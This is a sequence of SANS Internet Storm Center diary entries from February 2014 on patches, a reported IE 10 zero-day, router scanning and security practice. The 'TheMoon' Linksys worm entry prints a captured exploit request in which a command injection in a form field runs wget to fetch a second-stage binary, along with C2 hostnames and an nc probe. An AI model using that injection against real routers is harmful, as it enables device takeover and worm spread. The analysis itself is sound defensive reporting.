Latest Alerts

SYM14-004 Symantec Endpoint Protection Management Vulnerabilities - http://www.symantec.com/business/support/index?page=content&id=TECH214866, (Fri, Feb 14th)

Thu, 02/13/2014 - 20:32

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

FireEye reports IE 10 zero-day being used in watering hole attack, (Fri, Feb 14th)

Thu, 02/13/2014 - 20:11

The good people of FireEye Labs posted on discovery of a IE 10 zero-day being used in watering hole attack on a breached server in the US [1].

FireEye are working with Microsoft, so details are fairly thin. To quote from their first short blog post:

"It’s a brand new zero-day that targets IE 10 users visiting the compromised website–a classic drive-by download attack. Upon successful exploitation, this zero-day attack will download a XOR encoded payload from a remote server, decode and execute it."

Those looking after IE 10 users may want to keep an eye on their proxy logs for the follow on download as a potential indicator. 

UPDATE

FireEye have provided a great deal of detail on the attack in a second blog post, which is well worth a read and gives plenty of the indicators of compromise to run through your logs and filters:

http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html

[1] http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, February 14th 2014 http://isc.sans.edu/podcastdetail.html?id=3845, (Fri, Feb 14th)

Thu, 02/13/2014 - 19:35
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Scanning activity for /siemens/bootstrapping/JnlpBrowser/Development/, (Fri, Feb 14th)

Thu, 02/13/2014 - 17:04
One of our reader, Mike, wrote with some unusual hits in his web logs for /siemens/bootstrapping/JnlpBrowser/Development/ HTTP/1.1 which he thoughtfully shared.   The first scan was a solitary scan on the 12th of February 2014 and then followed up by three new scans on the 13th of February 2014.   The scanning IP address 194.95.72.110 has a host name of fb02itsscan.fh-muenster.de, a quick look up shows the web site and that web site offers this hearty welcome: Welcome to the University of Applied Sciences Münster   So potentially another academic "study" that scans the internet.  Anyone had information on what they may be looking for or if this is attached to a legitimate study?   Please write in a let us know.  

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Linksys Worm "TheMoon" Summary: What we know so far, (Thu, Feb 13th)

Thu, 02/13/2014 - 10:37

I am writing this summary as the prior diaries about this topic became a bit difficult to parse. 

At this point, we are aware of a worm that is spreading among various models of Linksys routers. We do not have a definite list of routers that are vulnerable, but the following routers may be vulnerable depending on firmware version: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900

The worm will connect first to port 8080, and if necessary using SSL, to request the "/HNAP1/" URL. This will return an XML formatted list of router features and firmware versions. The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:

<ModelName>E2500</ModelName> <FirmwareVersion>1.0.07 build 1</FirmwareVersion>

(this is a sample from an E2500 router running firmware version 1.0.07 build 1)

Next, the worm will send an exploit to a vulnerable CGI script running on these routers. The request does not require authentication. The worm sends random "admin" credentials but they are not checked by the script. Linksys (Belkin) is aware of this vulnerability.

This second request will launch a simple shell script, that will request the actual worm. The worm is about 2MB in size, samples that we captured so far appear pretty much identical but for a random trailer at the end of the binary. The file is an ELF MIPS binary.

Once this code runs, the infected router appears to scan for other victims. The worm includes a list of about 670 different networks (some /21, some /24). All appear to be linked to cable or DSL modem ISPs in various countries.

An infected router will also serve the binary at a random low port for new victims to download. This http server is only opened for a short period of time, and for each target, a new server with a different port is opened. 

We do not know for sure if there is a command and control channel yet. But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm.

We call this a "worm" at this point, as all it appears to do is spread. This may be a "bot" if there is a functional command and control channel present.

Indicators of compromisse:

- heavy outbound scanning on port 80 and 8080.
- inbound connection attempts to misc ports < 1024.
 

Detecting potentially vulnerable system:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080

if you get the XML HNAP output back, then you MAY be vulnerable.

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Linksys Worm ("TheMoon") Captured, (Thu, Feb 13th)

Thu, 02/13/2014 - 10:06

Assistance needed:

  • If you have a vulnerable device that is infected, we could use full packet captures from that device. I am still trying to find out more about the command and control channel (if it exists).
  • if you have experience reverse engineering MIPS malware, ask me for a sample (use the contact form.)

One important update: This affects other Linksys routers as well. For example, we do have some routers conecting to the honeypot that identify themselves as E2500 (Firmware 1.0.03 build 4)

Finally our honeypot did capture something that looks like it is responsible for the scanning activity we see:

The initial request, as discussed earlier, is:

GET /HNAP1/ HTTP/1.1 Host: [ip of host]:8080   The next request is where it gets interesting:   POST /[withheld].cgi HTTP/1.1 Host: [ip of honeypot]:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ip of honeypot]:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH <- username: admin password: &i1*@U$6xvcG (still trying to figure out the significance of this password) Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 518 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63 %74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f %6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74 %63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63 %64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20 %5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e %xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69 %64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31   The decoded version of this request: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi` &StartEPI=1

So it looks like it will try to download a "second stage" from port 193 from the attacking router. The ".L26" file appears to be a lock file to prevent multiple exploitation. 

I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit.

The port appears to change but is always < 1024. The second stage binary si always three letters and then a "random" extension.

 

Here are the MD5s of some of the binaries I retrieved so far. They are ELF binaries . If anybody would like to assist in reversing them, please contact me for a sample.

d9547024ace9d91037cbeee5161df33e  0dQ.png
a85e4a90a7b303155477ee1697995a43  Dsn.raw
88a5c5f9c5de5ba612ec96682d61c7bb  EXr.pdf
ef19de47b051cb01928cab1a4f3eaa0e  Osn.asc

file type: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

I am going to update this diary a bit blow-by-blow like as I am getting to reverse parts of the second stage.   - The binary includes a set of hard coded netblocks (/24 and /21) which are likely the blocks it scans.  - there are also hardcoded dyndyn.org host names. Not sure yet what they are for (C&C?): azlan281.dyndns.org, littlefrog.dyndns.org, charinalg06.dyndns.org, xplunk.dyndns-home.com and more. - just based on "strings" still, it looks like there is a command and control channel use to report back the status of the host. - a list of user agents: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1) Mozilla/2.0 (compatible; MSIE 3.0B; Win32) Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.0.3705) Mozilla/4.0 (compatible; MSIE 6.0; Win32) WebWasher 3.0 Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en] Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.4.14-xfs; X11; i686) Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/xxx.x (KHTML like Gecko) Safari/12x.x Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7 Opera/9.60 (Windows NT 5.1; U; de) Presto/2.1.1 Opera/9.0 (Windows NT 5.1; U; en) Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686; U;) Gecko/20011224 Opera/6.x (Linux 2.4.8-26mdk i686; U) [en] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3 Mozilla/5.0 (X11; Linux i686; U;rv: 1.7.13) Gecko/20070322 Kazehakase/0.4.4.1   - a list of server banners: Apache/2.2.9 (Fedora) Apache/1.3.3 (Unix)  (Red Hat/Linux) Apache/1.3.23 Microsoft-IIS/5.0 nginx Microsoft-IIS/5.1 Netscape-Enterprise/4.1 Microsoft-IIS/6.0 Apache/2.2.24 (Amazon) Sun-ONE-Web-Server/6.1 Microsoft-IIS/7.5 IBM_HTTP_Server   Extensions and media types used for the 2nd stage files:   application/pdf .pdf image/png image/gif .gif image/jpeg .jpg image/bmp .bmp image/tiff .tif audio/ac3 .ac3 audio/asc .asc audio/ogg .ogg audio/midi .mid audio/mpeg .mpg video/mpeg video/avi .avi video/raw .raw   The binary is linked against OpenSSL, so the C&C channel could use SSL.   The binary also includes a couple of images (thanks Peter for pointing that out). The creation date of the images is May 9th 2013. They appear to be logos identifying the author? There are a total of 5 PNG images. 3 smilies and 2 logos. I am including the larger logo below. There are a number of strings with references to "lunar", "moon", "planets" that appear to be used as part of the C&C channel.     The reference to "Lunar Industries" and the logo appears to be a reference to the movie "The Moon" http://www.imdb.com/title/tt1182345/  

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, February 13th 2014 http://isc.sans.edu/podcastdetail.html?id=3842, (Thu, Feb 13th)

Wed, 02/12/2014 - 20:16
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Suspected Mass Exploit Against Linksys E1000 / E1200 Routers, (Wed, Feb 12th)

Wed, 02/12/2014 - 06:35

Brett, who operates an ISP in Wyoming, notified us that he had a number of customers with compromissed Linksys routers these last couple of days. The routers, once compromissed, scan port 80 and 8080 as fast as they can (saturating bandwidth available). 

It is not clear which vulnerability is being exploited, but Brett eliminated weak passwords. E1200 routers with the latest firmware (2.0.06) appear to be immune agains the exploit used. E1000 routers are end-of-life and don't appear to have an immune firmware available.

As indicators, look for E1000/1200 routers which scan IP addresses sequentially on port 80/8080. Some of the routers may have modified DNS settings to point to Google's DNS server (8.8.8.8 or 8.8.4.4). 

If you have any insight, please let us know.

Update: The initial request sent by the exploited routers if they find port 80 or 8080 open is GET /HNAP1/ . HNAP is a REST based web service that can be used to administer these routers. It is possible that the exploited vulnerability is part of HNAP (it had problems in the past), or that HNAP is just used to fingerprint the router to select the right exploit to send.

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, February 12th 2014 http://isc.sans.edu/podcastdetail.html?id=3839, (Wed, Feb 12th)

Wed, 02/12/2014 - 06:29
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

February 2014 Microsoft Patch Tuesday, (Tue, Feb 11th)

Wed, 02/12/2014 - 06:29

Overview of the February 2014 Microsoft patches and their status.

 

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*) clients servers MS14-005 Information Disclosure Vulnerability in Microsoft XML Core Services
(ReplacesMS10-051 ) Microsoft XML Core Services
CVE-2014-0266 KB 2916036 Yes. Severity:Important
Exploitability: 3 Important Important MS14-006 IPv6 Denial of Service
(ReplacesMS13-065 ) TCP/IP Stack (IPv6)
CVE-2014-0254 KB 2904659 Yes. (vuln. known) Severity:Important
Exploitability: 3 Important Important MS14-007 Remote Code Execution in Direct2D
(Replaces ) Direct2D
CVE-2014-0263 KB 2912390 No. Severity:Critical
Exploitability: 1 Critical Important MS14-008 Allow Remote Code Execution in Microsoft Forefront
(Replaces ) Microsoft Forefront
CVE-2014-0294 KB 2927022 No. Severity:Critical
Exploitability: 1 N/A Critical MS14-009 Elevation of Privilege Vulnerability in .Net Framework
(Replaces MS13-052, MS11-100 ) .Net Framework
CVE-2014-0253
CVE-2014-0257
CVE-2014-0295 KB 2916607 Yes. Severity:Important
Exploitability: 1 Important Important MS14-010 Cumulative Security Update for Internet Explorer
(ReplacesMS13-097 ) Internet Explorer
CVE-2014-0267
CVE-2014-0268
CVE-2014-0269
CVE-2014-0270
CVE-2014-0271
CVE-2014-0272
CVE-2014-0273
CVE-2014-0273
CVE-2014-0274
CVE-2014-0275
CVE-2014-0276
CVE-2014-0277
CVE-2014-0278
CVE-2014-0279
CVE-2014-0280
CVE-2014-0281
CVE-2014-0283
CVE-2014-0284
CVE-2014-0285
CVE-2014-0286
CVE-2014-0287
CVE-2014-0288
CVE-2014-0289
CVE-2014-0290
CVE-2014-0293 KB 2909921 Yes
(CVE-2014-0267) Severity:Critical
Exploitability: 1 PATCH NOW! Important MS14-011 Remote Code Execution Vulnerability in VBScript Scripting
(Replaces MS10-022 ) VBScript
CVE-2014-0271 KB 2928390 No. Severity:Critical
Exploitability: 1 Critical Critical We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY (*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe February 2014 Patch Tuesday, (Tue, Feb 11th)

Tue, 02/11/2014 - 18:45

Adobe released one patch today: APSB14-006 [1]. It addresses a vulnerablity in Shockwave Player.It does affect Windows and OS X. The current version is now 12.0.9.149 . The update has a priority rating of "1" which implies that the vulnerability has been exploited in targeted attacks.

 

[1] http://helpx.adobe.com/security/products/shockwave/apsb14-06.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, February 11th 2014 http://isc.sans.edu/podcastdetail.html?id=3836, (Tue, Feb 11th)

Mon, 02/10/2014 - 18:23
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Isn't it About Time to Get Moving on Chip and PIN?, (Mon, Feb 10th)

Mon, 02/10/2014 - 09:50

I got to thinking about the 3 "big story" breaches that we've all been discussing over the last month or so.  Just adding things up, we're at a count of over 100 million cards and personal information disclosed.

Just thinking about it over the weekend, I realized two things:
1/ All these breaches affect the only region still using card-swipe only credit cards - the United States.
2/ The count of cards compromised is right around 1/3 the population of the United States

With this many cards compromised and needing replacement, isn't it time that the industry wakes up and smells the coffee? Everyone (yes everyone) else in the world has moved to Chip and PIN technology, which makes theft of credit cards much more difficult (though not impossible, looking at recent events in the UK).  These breaches illustrate (again) that the US staying on this old technology for cards has the effect of making theft of cards much easier in the US, focusing the attention of criminals on US cards.

If we're replacing that many cards, wouldn't RIGHT NOW be a really good time to issue 110 million bright, shiny new Chip and PIN credit cards for the folks who are the victims of these breaches?  I know that this would complicate things on the logistics side, but it's not new technology - this could certainly be arranged.  Even if the Chip / PIN technology isn't actually used (there are a boatload of machines that need replacing for one thing), it at least gets things moving in the right direction.

Please, share your thoughts on this in our comment form - am I off base?

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

A Tale of Two Admins (and no Change Control), (Mon, Feb 10th)

Mon, 02/10/2014 - 09:45

I have a client who's done the right thing, they've broken out their test environment from their production environment.  The production environment is in a colocation facility, and uses a different firewall.  The test environment is in the office location, and shares the office subnet and the office firewall.  So sort-of the right thing, they're moving in the right direction - I would have given the test lab it's own firewalled DMZ subnet.

About two years ago, one of the server admins asked the office firewall administrator to open port 3389 (RDP) to a test box, so that they could continue their build at home.  Not a great solution - I would have told him to VPN in and do it without changing the firewall - but it was done, the build got done and life moved on.

Unfortunately, the firewall change was not documented, was not remembered and was not backed out.

Fast forward 2 years.  The two folks from 2 years back have both moved on to other positions and/or companies, and a new server admin is building a new Hyper-V server in the test environment.  They're just about to deploy to producion when he notices RDP connections to it from our friends in China.  Yes, that undocumented change had come home to roost!

So, after we did the post mortem, what did they learn?

  • There's no fixing a compromised hypervisor - NFO (Nuke from Orbit) - repartition the RAID Array and starting over is always the best advice.
  • Hypervisors don't need a GUI - they shouldn't be RDP'ing into that box for admin in the first place.
  • DOCUMENT ALL FIREWALL CHANGES.  HAVE A CHANGE CONTROL PROCESS.  Happily, they've got a formal change control process now.  On the firewall, there's an assessment step on all changes, to decide if the requested change is a good idea in the first place (open RDP was a singularly BAD idea).
  • Finally, they now run a basic NMAP scan (all addresses in the range, all ports) of the office environment from the colo, and the results are run through diff, comparing it for changes against yesterday's results.  This client is lucky in this regard because they have 2 separate locations that can scan each other, but in a more typical situation, the folks responsible for security might do this from their laptop, scanning from home after work or before driving in each day.

You'd be surprised what a full port scan might find - those issues we're stuck with on open ports on home firewalls (https://isc.sans.edu/forums/diary/Scans+Increase+for+New+Linksys+Backdoor+32764+TCP+/17336 and https://isc.sans.edu/diary/Exposed+UPNP+Devices/15040 for instance) would have been caught a long time ago if more folks scanned their infrastructure from the untrusted outside network!  Mind you, typically home users never patch their firewalls anyway, so all those open PNP and other backdoor ports are with us for the long haul now.

Do you regularly scan your firewall from the outside?  Does your scan highlight changes, or are you looking for just vulnerabilities (using Nessus or similar) rather than changes?   Let us know in our comment form below.

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, February 10th 2014 http://isc.sans.edu/podcastdetail.html?id=3833, (Mon, Feb 10th)

Sun, 02/09/2014 - 20:07
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Mandiant Highlighter 2, (Sun, Feb 9th)

Sun, 02/09/2014 - 10:38

In previous dairy I discussed the basic usage of Mandiant Highlighter .In this diary I will discuss some other features.

 

Mandiant Highlighter Graphic

The graphic is an overall view of the whole file. Each line/bar on the graph represents a line in the text, the length are proportional to the line lengths in the file. When you highlight a word on the text it will be highlighted on the graph as well.


If you would like to specify the range of data that you would like to display, you can do that by entering the range in “Zoom Control” section in the right bottom of the screen:


 

Windows Event Viewer:

To view Windows events, you have first to export it to .txt file. Here is the steps to Save the event files to text file:

1-Right click on the event category:


 

2-Select “Save All Events As  ...”

3-Type the file name and select Text from “Save Type As “Drop menu

 


 

 Now you can use Mandiant Highlighter to parse the Windows Events

 

Regular Expressions:

Can you imagine a powerful log parser without regular expression support? To use regular expressions in Mandiant Highlighter enter the regular expression in the Keyword box then select Case Sensitive RegExp/Case Insensitive drop menu




 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

New ISO Standards on Vulnerability Handling and Disclosure, (Fri, Feb 7th)

Fri, 02/07/2014 - 05:26

Also in the news, ISO standard 30111 was published recently (on Jan 21) - a standard for the Vulnerability Handling Processes.  The standard was edited by Katie Moussouris, Senior Security Strategist Lead at Microsoft

The standard covers all the basics, including Vulnerability Verification steps, the Vulnerability Handling Process, and of particular interest is that it delineates where vendors should and should not be in the process.

The companion document, ISO 29147 (published in 2013) covers Vulnerability Disclosure.  This one is extremely valuable both to security researchers and for any company with a software product.  This standard includes guidance on buidling a framework to address vulnerabilities, including a 5 step process that guides vendors through initial receipt and verification of the vulnerability, developing a resolution, releasing the final fix and communication with customers after the fix is released

As with all ISO standards, unfortunately these are not free - both are well worth it if the standards apply to your organization.  If your organization writes code, or if you sell hardware that runs code, both of these standards are a must-have.
ISO 30111 can be purchased here: http://www.iso.org/iso/catalogue_detail.htm?csnumber=53231
ISO 29147 can be purchased here: http://www.iso.org/iso/catalogue_detail.htm?csnumber=45170

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, February 7th 2014 http://isc.sans.edu/podcastdetail.html?id=3830, (Fri, Feb 7th)

Thu, 02/06/2014 - 18:24
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Hello Virustotal? It's Microsoft Calling., (Fri, Feb 7th)

Thu, 02/06/2014 - 18:18

You might think that phone call might be unlikely, but as of this week it's built in and is likely happening right now.

I was poking around in the latest version of Sysinternals, and tripped over a new option.  You can now submit any running process in memory directly to Virustotal.  it's a simple right-click in the latest version of Process Explorer.

If that's not just the coolest thing!  If your AV product isn't triggering on a suspect process, you can now query all the AV engines without even having to find or upload the file - - assuming that a file that matches your process even exists - if you're in the midst of a security incident a suspect process might not have a matching file.

 

Sysinternals: http://technet.microsoft.com/en-us/sysinternals

VirusTotal: https://www.virustotal.com/

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Advance Notification for February 2014, (Fri, Feb 7th)

Thu, 02/06/2014 - 17:51

Today Microsoft published the advance notification for this months security bulletins. The bulletins will be published on February 11th (coming Tuesday) [1]. Again, we will have a pretty light patch day, with only 5 bulletins, and only 2 of these bulletins are considered critical.

Noteworthy: No Internet Explorer patches and no Office Patches. We will only see Windows Patches, a patch for .Net and a "Security Software" patch.  

Not part of the patch Tuesday, but still happening on the same day: Microsoft will no longer allow MD5 hashes for certificates. This may be difficult for some applications that haven't been changed over yet, even though Microsoft gave ample warning, and MD5 hashes have been shown to be badly broken for certificate signatures for a few years now. Just earlier today I ran into a brand new Axis, pretty expensive,  network camera that only allows the use of MD5 hashed certificate signatures.

 

[1] http://technet.microsoft.com/en-us/security/bulletin/ms14-feb

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts